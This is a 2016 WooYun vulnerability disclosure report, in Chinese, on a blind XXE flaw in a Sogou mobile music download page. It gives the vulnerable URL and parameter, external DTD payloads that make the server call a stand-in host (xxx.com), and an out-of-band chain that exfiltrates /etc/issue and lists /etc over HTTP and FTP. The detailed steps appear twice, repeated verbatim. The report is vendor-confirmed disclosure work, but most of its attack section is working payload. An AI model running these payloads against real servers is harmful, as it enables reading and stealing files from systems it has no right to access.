漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0210560
漏洞标题:搜狗某站文件读取/列目录(Java环境Blind XXE)
相关厂商:搜狗
漏洞作者: Vinc
提交时间:2016-05-19 16:20
修复时间:2016-07-07 20:10
公开时间:2016-07-07 20:10
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-05-19: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经确认,细节仅向厂商公开
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开
简要描述:
rt
详细说明:
http://m.sogou.com/music/musicDownload.jsp?album=%E5%8F%A3%E9%9F%B3&clk=2&keyword=1&lyc=&lyricMatch=yes&p=1&qqdurl=http://cc.stream.qqmusic.qq.com/C100002T2WQy2NIgLS.m4a%3Ffromtag%3D52&s=%E7%AA%A6%E5%94%AF&singer=%E7%AA%A6%E5%94%AF&size=0&title=1&type=%E6%9C%AA%E7%9F%A5&uID=qE_VFO3qxwVsK7Gx&url=http://xxx.com/1&v=2&w=1111
其中参数url存在XXE风险,这里没有回显,先通过HTTP Accesslog验证一下。
1的文件内容如下:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxx.com?xxoo">
%remote;
]>
</root>
然后看日志
只要我们服务器有接收到来源于解析服务器的请求,就证明存在XXE漏洞。
来直接读file内容,用到两个文件
文件1:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxx.com/2">
%remote;
]>
</root>
文件2:
<!ENTITY % payload SYSTEM "file:///etc/issue">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://xxx.com/%payload;'>">
%int;
%trick;
不成功。有两种办法,通过gopher或者ftp。我们来用ftp试一下。
修改文件2的内容:
<!ENTITY % payload SYSTEM "file:///etc/issue">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'ftp://xxx.com/%payload;'>">
%int;
%trick;
然后抓包,用wireshark看看。可以看到读取到了/etc/issue文件。
然后试一下列目录。
用了这个帖子里的监听代码。http://zone.wooyun.org/content/26651
读取一下/etc/下的文件
漏洞证明:
http://m.sogou.com/music/musicDownload.jsp?album=%E5%8F%A3%E9%9F%B3&clk=2&keyword=1&lyc=&lyricMatch=yes&p=1&qqdurl=http://cc.stream.qqmusic.qq.com/C100002T2WQy2NIgLS.m4a%3Ffromtag%3D52&s=%E7%AA%A6%E5%94%AF&singer=%E7%AA%A6%E5%94%AF&size=0&title=1&type=%E6%9C%AA%E7%9F%A5&uID=qE_VFO3qxwVsK7Gx&url=http://xxx.com/1&v=2&w=1111
其中参数url存在XXE风险,这里没有回显,先通过HTTP Accesslog验证一下。
1的文件内容如下:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxx.com?xxoo">
%remote;
]>
</root>
然后看日志
只要我们服务器有接收到来源于解析服务器的请求,就证明存在XXE漏洞。
来直接读file内容,用到两个文件
文件1:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://xxx.com/2">
%remote;
]>
</root>
文件2:
<!ENTITY % payload SYSTEM "file:///etc/issue">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://xxx.com/%payload;'>">
%int;
%trick;
不成功。有两种办法,通过gopher或者ftp。我们来用ftp试一下。
修改文件2的内容:
<!ENTITY % payload SYSTEM "file:///etc/issue">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'ftp://xxx.com/%payload;'>">
%int;
%trick;
然后抓包,用wireshark看看。可以看到读取到了/etc/issue文件。
然后试一下列目录。
用了这个帖子里的监听代码。http://zone.wooyun.org/content/26651
读取一下/etc/下的文件
修复方案:
.
版权声明:转载请注明来源 Vinc@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2016-05-23 20:04
厂商回复:
感谢支持
最新状态:
暂无